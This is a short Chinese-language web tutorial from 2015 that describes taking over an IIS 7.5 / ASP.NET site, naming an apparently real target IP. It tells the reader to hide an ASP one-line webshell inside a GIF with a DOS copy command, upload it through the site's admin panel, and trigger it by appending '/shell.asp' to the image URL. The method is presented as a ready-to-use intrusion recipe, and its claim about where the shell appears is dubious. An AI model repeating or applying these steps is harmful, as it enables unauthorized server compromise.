当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

IIS7.5畸形解析拿shell利用方法

时间:2015/5/19 19:16:06 作者:平凡之路 来源:xuhantao.com 浏览:

目标站:XXXX.com/
目标IP 14.1.20.105
服务器系统Microsoft-IIS/7.5
环境平台ASP.NET
这个站是IIS7.5的  拿站过程就不写了 直接讲进入后台
准备一个txt 写进我们的asp一句话 还有随便的一张图片
然后DOS合并:copy X.gif /b + X.txt/a X.gif
生成X.gif   然后在后台上传合成的图片
得到了XXXX.com/Upload/Uploadfile/images/x.gif是我们图片的地址
然后在地址后面加个shell.asp,www.xuhantao.com,
XXXX.com/Upload/Uploadfile/images/x.gif/shell.asp
在浏览器中运行   它会提示错误 然后会在目录下生成
XXXX.com/shell.asp它就是我们的一句话木马地址
BY:半世倾尘 ,涛涛电脑知识

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1